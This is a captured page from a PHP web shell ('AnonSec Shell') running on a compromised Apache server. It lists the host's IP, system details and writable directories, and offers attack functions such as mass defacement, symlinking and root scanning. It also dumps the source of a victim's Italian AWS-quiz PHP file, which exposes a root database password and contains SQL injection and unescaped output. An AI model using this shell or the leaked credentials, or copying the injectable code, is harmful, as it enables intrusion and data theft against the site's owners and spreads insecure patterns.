. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 52.223.31.75  /  Your IP : 172.31.6.220   [ Reverse IP ]
Web Server : Apache/2.4.66 () OpenSSL/1.0.2k-fips PHP/7.4.33
System : Linux ip-172-31-14-81.eu-central-1.compute.internal 4.14.281-212.502.amzn2.x86_64 #1 SMP Thu May 26 09:52:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
Domains : 4 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/ascii/www/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/ascii/www/esame.php
<link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/1.10.13/css/jquery.dataTables.min.css">
<script src="https://code.jquery.com/jquery-3.1.1.slim.min.js"></script>
<script src="https://cdn.datatables.net/1.10.13/js/jquery.dataTables.min.js"></script>


<?php
$dbName="aws";
$dbHost="127.0.0.1";
$dbUser="root";
//$dbPass="root";
$dbPass="!1deMRh7AQ";
$connessione=mysql_connect($dbHost,$dbUser,$dbPass) or die (mysql_error());
$database = mysql_select_db($dbName,$connessione) or die (mysql_error());
mysql_query('SET CHARACTER SET utf8');


if(array_key_exists("inserimento", $_POST)){
   
    if($_POST['domanda'] && $_POST['risposta']){

        $sql = "INSERT INTO `".$dbName."`.`quiz_aws_sap` (`domanda`, `risposta`,`altro`) VALUES ( '".$_POST['domanda']."', '".$_POST['risposta']."','ok');";
        mysql_query($sql);
        $vartemp =mysql_error();
        if($vartemp){
            echo "<h1>ERRORE: $vartemp <br><br>$sql<br><br></h1>";
        }else{
            echo "<h1>Inserito<br><br></h1>";
        }
    }else{
        echo "<h1>ERRORE: Campi Vuoti <br><br></h1>";
    }

}

$tipo = "quiz_aws_sap";

?>
<table><tr><td>
<?php
//carico i dati da db
        if(array_key_exists("tipe", $_GET)){
            if($_GET['tipe'] == "awsa"){
                $result = mysql_query("SELECT * FROM quiz_awsa");   
                echo '<h2 class="badge badge-info" style="font-size: 23px; padding: 13px;">AWSA</h2>';
                echo '<h2 class="badge badge-info" style="font-size: 13px; padding: 13px;margin-left:10px;"><a href="?tipe=awsd">AWSD</a></h2>';
                echo '<h2 class="badge badge-info" style="font-size: 13px; padding: 13px;margin-left:10px;"><a href="?tipe=awss">AWS SysOps</a></h2>';
                echo '<h2 class="badge badge-info" style="font-size: 13px; padding: 13px;margin-left:10px;"><a href="?tipe=awsa">AWSA</a></h2>';
                $tipe = "awsa";
 
            }if($_GET['tipe'] == "awsd"){
                $result = mysql_query("SELECT * FROM quiz_awsd");   
                echo '<h2 class="badge badge-info" style="font-size: 23px; padding: 13px;">AWSA</h2>';
                echo '<h2 class="badge badge-info" style="font-size: 13px; padding: 13px;margin-left:10px;"><a href="?tipe=awsd">AWSD</a></h2>';
                echo '<h2 class="badge badge-info" style="font-size: 13px; padding: 13px;margin-left:10px;"><a href="?tipe=awss">AWS SysOps</a></h2>';
                echo '<h2 class="badge badge-info" style="font-size: 13px; padding: 13px;margin-left:10px;"><a href="?tipe=awsa">AWSA</a></h2>';
                $tipe = "awsa";
 
            }else{
                $result = mysql_query("SELECT * FROM quiz_awss");   
                echo '<h2 class="badge badge-info" style="font-size: 23px; padding: 13px;">AWSD</h2>'; 
                echo '<h2 class="badge badge-info" style="font-size: 13px; padding: 13px;margin-left:10px;"><a href="?tipe=awsd">AWSD</a></h2>';
                echo '<h2 class="badge badge-info" style="font-size: 13px; padding: 13px;margin-left:10px;"><a href="?tipe=awss">AWS SysOps</a></h2>';
                echo '<h2 class="badge badge-info" style="font-size: 13px; padding: 13px;margin-left:10px;"><a href="?tipe=awsa">AWSA</a></h2>';
                $tipe = "awss";
            }
        }else{
                $result = mysql_query("SELECT * FROM quiz_aws_sap");    
                echo '<h2 class="badge badge-info" style="font-size: 23px; padding: 13px;">quiz_awsdevops</h2>';
                echo '<h2 class="badge badge-info" style="font-size: 13px; padding: 13px;margin-left:10px;"><a href="?tipe=quiz_awsdevops">AWSA</a></h2>';
                $tipe = "awss";
        }

        echo '<h2 class="badge badge-info" style="font-size: 13px; padding: 13px;margin-left:10px;"><a href="?tipe='.$tipe.'&inserimento">Inserimento AWSSysOps</a></h2>';

        ?>

</table>
<?php if(array_key_exists("inserimento", $_GET)){ ?> 

<hr><br>

<form method="POST" action="?inserimento">
    <h2>Inserimento AWS</h2>
    Domanda:<br>
    <textarea rows="5" style="width:70%" name="domanda"></textarea><br>
    Risposta:<br>
    <textarea rows="5" style="width:70%" name="risposta"></textarea><br><br>
    <input style="width: 50%;height: 70px;background:green;" type="submit" name="">
    <input type="hidden" name="inserimento" value="true">
</form>

<?php } ?>

<br><hr><br>
<table id="myTable">
    <thead>
        <tr><th>Domanda</th>
            <th>Risposta</th>
      <th>Altro</th>
           
        </tr>
    </thead>
    <tbody>
    <?php

        
        
        while ($row = mysql_fetch_assoc($result)){

            echo '<tr style="border-bottom:2px solid black;">';
            echo '<td><b>'. $row['domanda'].'</b></td>';
            echo '<td><b>'. $row['risposta'].'</b></td>';  
            echo '<td style="width:3%"><b>'. $row['altro'].'</b></td>';
          
            
            echo '</tr>';

        }
    ?>
        
        
    </tbody>

</table>


<script type="text/javascript">
$(document).ready(function(){
    $('#myTable').DataTable();
});

</script>

Anon7 - 2022
AnonSec Team